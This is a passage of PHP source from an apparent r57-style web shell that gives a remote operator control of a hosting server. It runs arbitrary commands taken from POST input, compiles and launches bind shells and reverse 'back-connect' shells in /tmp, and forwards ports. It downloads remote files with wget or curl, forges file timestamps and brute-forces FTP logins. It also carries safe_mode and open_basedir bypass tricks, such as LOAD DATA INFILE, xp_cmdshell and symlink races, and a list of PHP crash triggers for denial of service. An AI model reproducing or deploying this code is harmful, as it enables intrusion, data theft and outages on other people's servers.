  4574. case 'mod':
  4575.  
  4576. @chmod($_POST['param1'],intval($_POST['param2'],8));
  4577.  
  4578. break;
  4579.  
  4580. }
  4581.  
  4582. $_POST['cmd']="";
  4583.  
  4584. }
  4585.  
  4586. if(!empty($_POST['cmd']) &&$_POST['cmd']=="mk")
  4587.  
  4588. {
  4589.  
  4590. switch($_POST['what'])
  4591.  
  4592. {
  4593.  
  4594. case 'file':
  4595.  
  4596. if($_POST['action'] == "create")
  4597.  
  4598. {
  4599.  
  4600. if(@file_exists($_POST['mk_name']) ||!$file=@fopen($_POST['mk_name'],"w")) {err(2,$_POST['mk_name']);$_POST['cmd']="";}
  4601.  
  4602. else {
  4603.  
  4604. @fclose($file);
  4605.  
  4606. $_POST['e_name'] = $_POST['mk_name'];
  4607.  
  4608. $_POST['cmd']="edit_file";
  4609.  
  4610. echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
  4611.  
  4612. }
  4613.  
  4614. }
  4615.  
  4616. else if($_POST['action'] == "delete")
  4617.  
  4618. {
  4619.  
  4620. if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
  4621.  
  4622. $_POST['cmd']="";
  4623.  
  4624. }
  4625.  
  4626. break;
  4627.  
  4628. case 'dir':
  4629.  
  4630. if($_POST['action'] == "create"){
  4631.  
  4632. if(@mkdir($_POST['mk_name']))
  4633.  
  4634. {
  4635.  
  4636. $_POST['cmd']="";
  4637.  
  4638. echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
  4639.  
  4640. }
  4641.  
  4642. else {err(2,$_POST['mk_name']);$_POST['cmd']="";}
  4643.  
  4644. }
  4645.  
  4646. else if($_POST['action'] == "delete"){
  4647.  
  4648. if(@rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
  4649.  
  4650. $_POST['cmd']="";
  4651.  
  4652. }
  4653.  
  4654. break;
  4655.  
  4656. }
  4657.  
  4658. }
  4659.  
  4660. if(!empty($_POST['cmd']) &&$_POST['cmd']=="touch")
  4661.  
  4662. {
  4663.  
  4664. if(!$_POST['file_name_r'])
  4665.  
  4666. {
  4667.  
  4668. $datar = $_POST['day']." ".$_POST['month']." ".$_POST['year']." ".$_POST['chasi']." hours ".$_POST['minutes']." minutes ".$_POST['second']." seconds";
  4669.  
  4670. $datar = @strtotime($datar);
  4671.  
  4672. @touch($_POST['file_name'],$datar,$datar);}
  4673.  
  4674. else{
  4675.  
  4676. @touch($_POST['file_name'],@filemtime($_POST['file_name_r']),@filemtime($_POST['file_name_r']));
  4677.  
  4678. }
  4679.  
  4680. $_POST['cmd']="";
  4681.  
  4682. }
  4683.  
  4684. if(!empty($_POST['cmd']) &&$_POST['cmd']=="edit_file"&&!empty($_POST['e_name']))
  4685.  
  4686. {
  4687.  
  4688. if(!$file=@fopen($_POST['e_name'],"r+")) {$filedump = @fread($file,@filesize($_POST['e_name']));@fclose($file);$only_read = 1;}
  4689.  
  4690. if($file=@fopen($_POST['e_name'],"r")) {$filedump = @fread($file,@filesize($_POST['e_name']));@fclose($file);}
  4691.  
  4692. else if ($file=readzlib($_POST['e_name'])) {$filedump = $file;$only_read = 1;}else {err(1,$_POST['e_name']);$_POST['cmd']="";}
  4693.  
  4694. if(isset($_POST['cmd']))
  4695.  
  4696. {
  4697.  
  4698. echo $table_up3;
  4699.  
  4700. echo $font;
  4701.  
  4702. echo "<form name=save_file method=post>";
  4703.  
  4704. echo ws(3)."<b>".$_POST['e_name']."</b>";
  4705.  
  4706. echo "<div align=center><textarea name=e_text cols=121 rows=24>";
  4707.  
  4708. echo @htmlspecialchars($filedump);
  4709.  
  4710. echo "</textarea>";
  4711.  
  4712. echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
  4713.  
  4714. echo "<input type=hidden name=dir value=".$dir.">";
  4715.  
  4716. echo "<input type=hidden name=cmd value=save_file>";
  4717.  
  4718. echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
  4719.  
  4720. echo "</div>";
  4721.  
  4722. echo "</font>";
  4723.  
  4724. echo "</form>";
  4725.  
  4726. echo "</td></tr></table>";
  4727.  
  4728. exit();
  4729.  
  4730. }
  4731.  
  4732. }
  4733.  
  4734. if(!empty($_POST['cmd']) &&$_POST['cmd']=="save_file")
  4735.  
  4736. {
  4737.  
  4738. $mtime = @filemtime($_POST['e_name']);
  4739.  
  4740. if((!$file=@fopen($_POST['e_name'],"w")) &&(!function_exists('file_put_contents'))) {err(0,$_POST['e_name']);}
  4741.  
  4742. else {
  4743.  
  4744. if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
  4745.  
  4746. @fwrite($file,$_POST['e_text']) or @fputs($file,$_POST['e_text']) or @file_put_contents($_POST['e_name'],$_POST['e_text']);
  4747.  
  4748. @touch($_POST['e_name'],$mtime,$mtime);
  4749.  
  4750. $_POST['cmd']="";
  4751.  
  4752. echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
  4753.  
  4754. }
  4755.  
  4756. }
  4757.  
  4758. if (!empty($_POST['proxy_port'])&&($_POST['use']=="Perl"))
  4759.  
  4760. {
  4761.  
  4762. cf("/tmp/prxpl",$prx_pl);
  4763.  
  4764. $p2=which("perl");
  4765.  
  4766. $blah = ex($p2." /tmp/prxpl ".$_POST['proxy_port']." &");
  4767.  
  4768. $_POST['cmd']="ps -aux | grep prxpl";
  4769.  
  4770. }
  4771.  
  4772. if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
  4773.  
  4774. {
  4775.  
  4776. cf("/tmp/bd.c",$port_bind_bd_c);
  4777.  
  4778. $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
  4779.  
  4780. @unlink("/tmp/bd.c");
  4781.  
  4782. $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
  4783.  
  4784. $_POST['cmd']="ps -aux | grep bd";
  4785.  
  4786. }
  4787.  
  4788. if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
  4789.  
  4790. {
  4791.  
  4792. cf("/tmp/bdpl",$port_bind_bd_pl);
  4793.  
  4794. $p2=which("perl");
  4795.  
  4796. $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
  4797.  
  4798. $_POST['cmd']="ps -aux | grep bdpl";
  4799.  
  4800. }
  4801.  
  4802. if (!empty($_POST['ip']) &&!empty($_POST['port']) &&($_POST['use']=="Perl"))
  4803.  
  4804. {
  4805.  
  4806. cf("/tmp/back",$back_connect);
  4807.  
  4808. $p2=which("perl");
  4809.  
  4810. $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
  4811.  
  4812. $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
  4813.  
  4814. }
  4815.  
  4816. if (!empty($_POST['ip']) &&!empty($_POST['port']) &&($_POST['use']=="C"))
  4817.  
  4818. {
  4819.  
  4820. cf("/tmp/back.c",$back_connect_c);
  4821.  
  4822. $blah = ex("gcc -o /tmp/backc /tmp/back.c");
  4823.  
  4824. @unlink("/tmp/back.c");
  4825.  
  4826. $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
  4827.  
  4828. $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
  4829.  
  4830. }
  4831.  
  4832. if (!empty($_POST['local_port']) &&!empty($_POST['remote_host']) &&!empty($_POST['remote_port']) &&($_POST['use']=="Perl"))
  4833.  
  4834. {
  4835.  
  4836. cf("/tmp/dp",$datapipe_pl);
  4837.  
  4838. $p2=which("perl");
  4839.  
  4840. $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
  4841.  
  4842. $_POST['cmd']="ps -aux | grep dp";
  4843.  
  4844. }
  4845.  
  4846. if (!empty($_POST['local_port']) &&!empty($_POST['remote_host']) &&!empty($_POST['remote_port']) &&($_POST['use']=="C"))
  4847.  
  4848. {
  4849.  
  4850. cf("/tmp/dpc.c",$datapipe_c);
  4851.  
  4852. $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
  4853.  
  4854. @unlink("/tmp/dpc.c");
  4855.  
  4856. $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
  4857.  
  4858. $_POST['cmd']="ps -aux | grep dpc";
  4859.  
  4860. }
  4861.  
  4862. if (!empty($_POST['alias']) &&isset($aliases[$_POST['alias']])) {$_POST['cmd'] = $aliases[$_POST['alias']];}
  4863.  
  4864. for($upl=0;$upl<=16;$upl++)
  4865.  
  4866. {
  4867.  
  4868. if(!empty($HTTP_POST_FILES['userfile'.$upl]['name'])){
  4869.  
  4870. if(!empty($_POST['new_name']) &&($upl==0)) {$nfn = $_POST['new_name'];}
  4871.  
  4872. else {$nfn = $HTTP_POST_FILES['userfile'.$upl]['name'];}
  4873.  
  4874. @move_uploaded_file($HTTP_POST_FILES['userfile'.$upl]['tmp_name'],$_POST['dir']."/".$nfn)
  4875.  
  4876. or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile'.$upl]['name']."</div></font>");
  4877.  
  4878. }
  4879.  
  4880. }
  4881.  
  4882. if (!empty($_POST['with']) &&!empty($_POST['rem_file']) &&!empty($_POST['loc_file']))
  4883.  
  4884. {
  4885.  
  4886. switch($_POST['with'])
  4887.  
  4888. {
  4889.  
  4890. case 'fopen':
  4891.  
  4892. $datafile = @implode("",@file($_POST['rem_file']));
  4893.  
  4894. if($datafile)
  4895.  
  4896. {
  4897.  
  4898. $w_file=@fopen($_POST['loc_file'],"wb") or @function_exists('file_put_contents') or err(0);
  4899.  
  4900. if($w_file)
  4901.  
  4902. {
  4903.  
  4904. @fwrite($w_file,$datafile) or @fputs($w_file,$datafile) or @file_put_contents($_POST['loc_file'],$datafile);
  4905.  
  4906. @fclose($w_file);
  4907.  
  4908. }
  4909.  
  4910. }
  4911.  
  4912. $_POST['cmd'] = '';
  4913.  
  4914. break;
  4915.  
  4916. case 'wget':
  4917.  
  4918. $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
  4919.  
  4920. break;
  4921.  
  4922. case 'fetch':
  4923.  
  4924. $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
  4925.  
  4926. break;
  4927.  
  4928. case 'lynx':
  4929.  
  4930. $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
  4931.  
  4932. break;
  4933.  
  4934. case 'links':
  4935.  
  4936. $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
  4937.  
  4938. break;
  4939.  
  4940. case 'GET':
  4941.  
  4942. $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
  4943.  
  4944. break;
  4945.  
  4946. case 'curl':
  4947.  
  4948. $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
  4949.  
  4950. break;
  4951.  
  4952. }
  4953.  
  4954. }
  4955.  
  4956. if(!empty($_POST['cmd']) &&(($_POST['cmd']=="ftp_file_up") ||($_POST['cmd']=="ftp_file_down")))
  4957.  
  4958. {
  4959.  
  4960. list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
  4961.  
  4962. if(empty($ftp_port)) {$ftp_port = 21;}
  4963.  
  4964. $connection = @ftp_connect ($ftp_server,$ftp_port,10);
  4965.  
  4966. if(!$connection) {err(3);}
  4967.  
  4968. else
  4969.  
  4970. {
  4971.  
  4972. if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) {err(4);}
  4973.  
  4974. else
  4975.  
  4976. {
  4977.  
  4978. if($_POST['cmd']=="ftp_file_down") {if(chop($_POST['loc_file'])==$dir) {$_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']);}@ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);}
  4979.  
  4980. if($_POST['cmd']=="ftp_file_up")   {@ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);}
  4981.  
  4982. }
  4983.  
  4984. }
  4985.  
  4986. @ftp_close($connection);
  4987.  
  4988. $_POST['cmd'] = "";
  4989.  
  4990. }
  4991.  
  4992. if(!empty($_POST['cmd']) &&(($_POST['cmd']=="ftp_brute") ||($_POST['cmd']=="db_brute")))
  4993.  
  4994. {
  4995.  
  4996. if($_POST['cmd']=="ftp_brute"){
  4997.  
  4998. list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
  4999.  
  5000. if(empty($ftp_port)) {$ftp_port = 21;}
  5001.  
  5002. $connection = @ftp_connect ($ftp_server,$ftp_port,10);
  5003.  
  5004. }else if($_POST['cmd']=="db_brute"){
  5005.  
  5006. $connection = 1;
  5007.  
  5008. }
  5009.  
  5010. if(!$connection) {err(3);$_POST['cmd'] = "";}
  5011.  
  5012. else if(($_POST['brute_method']=='passwd') &&(!$users=get_users('/etc/passwd'))){echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>";$_POST['cmd'] = "";}
  5013.  
  5014. else if(($_POST['brute_method']=='dic') &&(!$users=get_users($_POST['dictionary']))){echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>Can\'t get password list</b></div></font></td></tr></table>";$_POST['cmd'] = "";}
  5015.  
  5016. if($_POST['cmd']=="ftp_brute"){@ftp_close($connection);}
  5017.  
  5018. }
  5019.  
  5020. echo $table_up3;
  5021.  
  5022. if (empty($_POST['cmd']) &&!$safe_mode &&!$open_basedir) {$_POST['cmd']=(!$unix)?("dir"):("ls -lia");}
  5023.  
  5024. else if(empty($_POST['cmd']) &&($safe_mode ||$open_basedir)){$_POST['cmd']="safe_dir";}
  5025.  
  5026. echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
  5027.  
  5028. if($safe_mode ||$open_basedir)
  5029.  
  5030. {
  5031.  
  5032. switch($_POST['cmd'])
  5033.  
  5034. {
  5035.  
  5036. case 'safe_dir':
  5037.  
  5038. $d=@dir($dir);
  5039.  
  5040. if ($d)
  5041.  
  5042. {
  5043.  
  5044. while (false!==($file=$d->read()))
  5045.  
  5046. {
  5047.  
  5048. if ($file=="."||$file=="..") continue;
  5049.  
  5050. @clearstatcache();
  5051.  
  5052. @list ($dev,$inode,$inodep,$nlink,$uid,$gid,$inodev,$size,$atime,$mtime,$ctime,$bsize) = stat($file);
  5053.  
  5054. if(!$unix){
  5055.  
  5056. echo date("d.m.Y H:i",$mtime);
  5057.  
  5058. if(@is_dir($file)) echo "  <DIR> ";else printf("% 7s ",$size);
  5059.  
  5060. }
  5061.  
  5062. else{
  5063.  
  5064. if(@function_exists('posix_getpwuid')){
  5065.  
  5066. $owner = @posix_getpwuid($uid);
  5067.  
  5068. $grgid = @posix_getgrgid($gid);
  5069.  
  5070. }else{$owner['name']=$grgid['name']='';}
  5071.  
  5072. echo $inode." ";
  5073.  
  5074. echo perms(@fileperms($file));
  5075.  
  5076. @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
  5077.  
  5078. echo date("d.m.Y H:i ",$mtime);
  5079.  
  5080. }
  5081.  
  5082. echo "$file\n";
  5083.  
  5084. }
  5085.  
  5086. $d->close();
  5087.  
  5088. }
  5089.  
  5090. else if(@function_exists('glob'))
  5091.  
  5092. {
  5093.  
  5094. function eh($errno,$errstr,$errfile,$errline)
  5095.  
  5096. {
  5097.  
  5098. global $D,$c,$i;
  5099.  
  5100. preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/",$errstr,$o);
  5101.  
  5102. if($o){$D[$c] = $o[2];$c++;}
  5103.  
  5104. }
  5105.  
  5106. $error_reporting = @ini_get('error_reporting');
  5107.  
  5108. error_reporting(E_WARNING);
  5109.  
  5110. @ini_set("display_errors",1);
  5111.  
  5112. $root = "/";
  5113.  
  5114. if($dir) $root = $dir;
  5115.  
  5116. $c = 0;$D = array();
  5117.  
  5118. @set_error_handler("eh");
  5119.  
  5120. $chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
  5121.  
  5122. for($i=0;$i <strlen($chars);$i++)
  5123.  
  5124. {
  5125.  
  5126. $path ="{$root}".((substr($root,-1)!="/") ?"/": NULL)."{$chars[$i]}";
  5127.  
  5128. $prevD = $D[count($D)-1];
  5129.  
  5130. @glob($path."*");
  5131.  
  5132. if($D[count($D)-1] != $prevD)
  5133.  
  5134. {
  5135.  
  5136. for($j=0;$j <strlen($chars);$j++)
  5137.  
  5138. {
  5139.  
  5140. $path ="{$root}".((substr($root,-1)!="/") ?"/": NULL)."{$chars[$i]}{$chars[$j]}";
  5141.  
  5142. $prevD2 = $D[count($D)-1];
  5143.  
  5144. @glob($path."*");
  5145.  
  5146. if($D[count($D)-1] != $prevD2)
  5147.  
  5148. {
  5149.  
  5150. for($p=0;$p <strlen($chars);$p++)
  5151.  
  5152. {
  5153.  
  5154. $path ="{$root}".((substr($root,-1)!="/") ?"/": NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}";
  5155.  
  5156. $prevD3 = $D[count($D)-1];
  5157.  
  5158. @glob($path."*");
  5159.  
  5160. if($D[count($D)-1] != $prevD3)
  5161.  
  5162. {
  5163.  
  5164. for($r=0;$r <strlen($chars);$r++)
  5165.  
  5166. {
  5167.  
  5168. $path ="{$root}".((substr($root,-1)!="/") ?"/": NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}";
  5169.  
  5170. @glob($path."*");
  5171.  
  5172. }
  5173.  
  5174. }
  5175.  
  5176. }
  5177.  
  5178. }
  5179.  
  5180. }
  5181.  
  5182. }
  5183.  
  5184. }
  5185.  
  5186. $D = array_unique($D);
  5187.  
  5188. foreach($D as $item) echo htmlspecialchars("{$item}")."\r\n";
  5189.  
  5190. error_reporting($error_reporting);
  5191.  
  5192. }
  5193.  
  5194. else echo $lang[$language.'_text29'];
  5195.  
  5196. break;
  5197.  
  5198. case 'test1':
  5199.  
  5200. $ci = @curl_init("file://".$_POST['test1_file']);
  5201.  
  5202. $cf = @curl_exec($ci);
  5203.  
  5204. echo htmlspecialchars($cf);
  5205.  
  5206. break;
  5207.  
  5208. case 'test2':
  5209.  
  5210. @include($_POST['test2_file']);
  5211.  
  5212. break;
  5213.  
  5214. case 'test3':
  5215.  
  5216. if(empty($_POST['test3_port'])) {$_POST['test3_port'] = "3306";}
  5217.  
  5218. $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
  5219.  
  5220. if($db)
  5221.  
  5222. {
  5223.  
  5224. if(@mysql_select_db($_POST['test3_md'],$db))
  5225.  
  5226. {
  5227.  
  5228. @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
  5229.  
  5230. @mysql_query("CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL )");
  5231.  
  5232. @mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");
  5233.  
  5234. $r = @mysql_query("SELECT * FROM temp_r57_table");
  5235.  
  5236. while(($r_sql = @mysql_fetch_array($r))) {echo @htmlspecialchars($r_sql[0])."\r\n";}
  5237.  
  5238. @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
  5239.  
  5240. }
  5241.  
  5242. else echo "[-] ERROR! Can't select database";
  5243.  
  5244. @mysql_close($db);
  5245.  
  5246. }
  5247.  
  5248. else echo "[-] ERROR! Can't connect to mysql server";
  5249.  
  5250. break;
  5251.  
  5252. case 'test4':
  5253.  
  5254. if(empty($_POST['test4_port'])) {$_POST['test4_port'] = "1433";}
  5255.  
  5256. $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
  5257.  
  5258. if($db)
  5259.  
  5260. {
  5261.  
  5262. if(@mssql_select_db($_POST['test4_md'],$db))
  5263.  
  5264. {
  5265.  
  5266. @mssql_query("drop table r57_temp_table",$db);
  5267.  
  5268. @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
  5269.  
  5270. @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
  5271.  
  5272. $res = mssql_query("select * from r57_temp_table",$db);
  5273.  
  5274. while(($row=@mssql_fetch_row($res)))
  5275.  
  5276. {
  5277.  
  5278. echo htmlspecialchars($row[0])."\r\n";
  5279.  
  5280. }
  5281.  
  5282. @mssql_query("drop table r57_temp_table",$db);
  5283.  
  5284. }
  5285.  
  5286. else echo "[-] ERROR! Can't select database";
  5287.  
  5288. @mssql_close($db);
  5289.  
  5290. }
  5291.  
  5292. else echo "[-] ERROR! Can't connect to MSSQL server";
  5293.  
  5294. break;
  5295.  
  5296. case 'test5':
  5297.  
  5298. $temp=tempnam($dir,"fname");
  5299.  
  5300. if (@file_exists($temp)) @unlink($temp);
  5301.  
  5302. $extra = "-C ".$_POST['test5_file']." -X $temp";
  5303.  
  5304. @mb_send_mail(NULL,NULL,NULL,NULL,$extra);
  5305.  
  5306. $str = moreread($temp);
  5307.  
  5308. echo htmlspecialchars($str);
  5309.  
  5310. @unlink($temp);
  5311.  
  5312. break;
  5313.  
  5314. case 'test6':
  5315.  
  5316. $stream = @imap_open('/etc/passwd',"","");
  5317.  
  5318. $dir_list = @imap_list($stream,trim($_POST['test6_file']),"*");
  5319.  
  5320. for ($i = 0;$i <count($dir_list);$i++) echo htmlspecialchars($dir_list[$i])."\r\n";
  5321.  
  5322. @imap_close($stream);
  5323.  
  5324. break;
  5325.  
  5326. case 'test7':
  5327.  
  5328. $stream = @imap_open($_POST['test7_file'],"","");
  5329.  
  5330. $str = @imap_body($stream,1);
  5331.  
  5332. echo htmlspecialchars($str);
  5333.  
  5334. @imap_close($stream);
  5335.  
  5336. break;
  5337.  
  5338. case 'test8':
  5339.  
  5340. $temp=@tempnam($_POST['test8_file2'],"copytemp");
  5341.  
  5342. $str = readzlib($_POST['test8_file1'],$temp);
  5343.  
  5344. echo htmlspecialchars($str);
  5345.  
  5346. @unlink($temp);
  5347.  
  5348. break;
  5349.  
  5350. case 'test9':
  5351.  
  5352. @ini_restore("safe_mode");
  5353.  
  5354. @ini_restore("open_basedir");
  5355.  
  5356. $str = moreread($_POST['test9_file']);
  5357.  
  5358. echo htmlspecialchars($str);
  5359.  
  5360. break;
  5361.  
  5362. case 'test10':
  5363.  
  5364. @ob_clean();
  5365.  
  5366. $error_reporting = @ini_get('error_reporting');
  5367.  
  5368. error_reporting(E_ALL ^E_NOTICE);
  5369.  
  5370. @ini_set("display_errors",1);
  5371.  
  5372. $str=fopen($_POST['test10_file'],"r");
  5373.  
  5374. while(!feof($str)){print htmlspecialchars(fgets($str));}
  5375.  
  5376. fclose($str);
  5377.  
  5378. error_reporting($error_reporting);
  5379.  
  5380. break;
  5381.  
  5382. case 'test11':
  5383.  
  5384. @ob_clean();
  5385.  
  5386. $temp = 'zip://'.$_POST['test11_file'];
  5387.  
  5388. $str = moreread($temp);
  5389.  
  5390. echo htmlspecialchars($str);
  5391.  
  5392. break;
  5393.  
  5394. case 'test12':
  5395.  
  5396. @ob_clean();
  5397.  
  5398. $temp = 'compress.bzip2://'.$_POST['test12_file'];
  5399.  
  5400. $str = moreread($temp);
  5401.  
  5402. echo htmlspecialchars($str);
  5403.  
  5404. break;
  5405.  
  5406. case 'test13':
  5407.  
  5408. @error_log($_POST['test13_file1'],3,"php://../../../../../../../../../../../".$_POST['test13_file2']);
  5409.  
  5410. echo $lang[$language.'_text61'];
  5411.  
  5412. break;
  5413.  
  5414. case 'test14':
  5415.  
  5416. @session_save_path($_POST['test14_file2']."\0;/tmp");
  5417.  
  5418. @session_start();
  5419.  
  5420. @$_SESSION[php]=$_POST['test14_file1'];
  5421.  
  5422. echo $lang[$language.'_text61'];
  5423.  
  5424. break;
  5425.  
  5426. case 'test15':
  5427.  
  5428. @readfile($_POST['test15_file1'],3,"php://../../../../../../../../../../../".$_POST['test15_file2']);
  5429.  
  5430. echo $lang[$language.'_text61'];
  5431.  
  5432. break;
  5433.  
  5434. case 'test16':
  5435.  
  5436. if (fopen('srpath://../../../../../../../../../../../'.$_POST['test16_file'],"a")) echo $lang[$language.'_text61'];
  5437.  
  5438. break;
  5439.  
  5440. case 'test17_1':
  5441.  
  5442. @unlink('symlinkread');
  5443.  
  5444. @symlink('a/a/a/a/a/a/','dummy');
  5445.  
  5446. @symlink('dummy/../../../../../../../../../../../'.$_POST['test17_file'],'symlinkread');
  5447.  
  5448. @unlink('dummy');
  5449.  
  5450. while (1)
  5451.  
  5452. {
  5453.  
  5454. @symlink('.','dummy');
  5455.  
  5456. @unlink('dummy');
  5457.  
  5458. }
  5459.  
  5460. break;
  5461.  
  5462. case 'test17_2':
  5463.  
  5464. $str='';
  5465.  
  5466. while (strlen($str) <3) {
  5467.  
  5468. $temp = 'symlinkread';
  5469.  
  5470. $str = moreread($temp);
  5471.  
  5472. if($str){@ob_clean();echo htmlspecialchars($str);}
  5473.  
  5474. }
  5475.  
  5476. break;
  5477.  
  5478. case 'test17_3':
  5479.  
  5480. $dir = $files = array();
  5481.  
  5482. if(@version_compare(@phpversion(),"5.0.0")>=0){
  5483.  
  5484. while (@count($dir) <3) {
  5485.  
  5486. $dir=@scandir('symlinkread');
  5487.  
  5488. if (@count($dir) >2) {@ob_clean();@print_r($dir);}
  5489.  
  5490. }
  5491.  
  5492. }
  5493.  
  5494. else {
  5495.  
  5496. while (@count($files) <3) {
  5497.  
  5498. $dh  = @opendir('symlinkread');
  5499.  
  5500. while (false !== ($filename = @readdir($dh))) {
  5501.  
  5502. $files[] = $filename;
  5503.  
  5504. }
  5505.  
  5506. if(@count($files) >2){@ob_clean();@print_r($files);}
  5507.  
  5508. }
  5509.  
  5510. }
  5511.  
  5512. break;
  5513.  
  5514. }
  5515.  
  5516. }
  5517.  
  5518. if((!$safe_mode) &&($_POST['cmd']!="php_eval") &&($_POST['cmd']!="mysql_dump") &&($_POST['cmd']!="db_query") &&($_POST['cmd']!="ftp_brute") &&($_POST['cmd']!="db_brute")){
  5519.  
  5520. $cmd_rep = ex($_POST['cmd']);
  5521.  
  5522. if(!$unix) {echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n";}
  5523.  
  5524. else {echo @htmlspecialchars($cmd_rep)."\n";}}
  5525.  
  5526. switch($_POST['cmd'])
  5527.  
  5528. {
  5529.  
  5530. case 'dos1':
  5531.  
  5532. function a() {a();}a();
  5533.  
  5534. break;
  5535.  
  5536. case 'dos2':
  5537.  
  5538. @pack("d4294967297",2);
  5539.  
  5540. break;
  5541.  
  5542. case 'dos3':
  5543.  
  5544. $a = "a";@unserialize(@str_replace('1',2147483647,@serialize($a)));
  5545.  
  5546. break;
  5547.  
  5548. case 'dos4':
  5549.  
  5550. $t = array(1);while (1) {$a[] = &$t;};
  5551.  
  5552. break;
  5553.  
  5554. case 'dos5':
  5555.  
  5556. @dl("sqlite.so");$db = new SqliteDatabase("foo");
  5557.  
  5558. break;
  5559.  
  5560. case 'dos6':
  5561.  
  5562. preg_match('/(.(?!b))*/',@str_repeat("a",10000));
  5563.  
  5564. break;
  5565.  
  5566. case 'dos7':
  5567.  
  5568. @str_replace("A",str_repeat("B",65535),str_repeat("A",65538));
  5569.  
  5570. break;
  5571.  
  5572. case 'dos8':
  5573.  
  5574. @shell_exec("killall -11 httpd");
  5575.  
  5576. break;
  5577.  
  5578. case 'dos9':
  5579.  
  5580. function cx(){@tempnam("/www/","../../../../../../var/tmp/cx");cx();}cx();
  5581.  
  5582. break;
  5583.  
  5584. case 'dos10':
  5585.  
  5586. $a = @str_repeat ("A",438013);$b = @str_repeat ("B",951140);@wordwrap ($a,0,$b,0);
  5587.  
  5588. break;
  5589.  
  5590. case 'dos11':
  5591.  
  5592. @array_fill(1,123456789,"Infigo-IS");
  5593.  
  5594. break;
  5595.  
  5596. case 'dos12':
  5597.  
  5598. @substr_compare("A","A",12345678);
  5599.  
  5600. break;
  5601.  
  5602. case 'dos13':
  5603.  
  5604. @unserialize("a:2147483649:{");
  5605.  
  5606. break;
  5607.  
  5608. case 'dos14':
  5609.  
  5610. $Data = @str_ireplace("\n","<br>",$Data);
  5611.  
  5612. break;
  5613.  
  5614. case 'dos15':
  5615.  
  5616. function toUTF($x) {return chr(($x >>6) +192) .chr(($x &63) +128);}
  5617.  
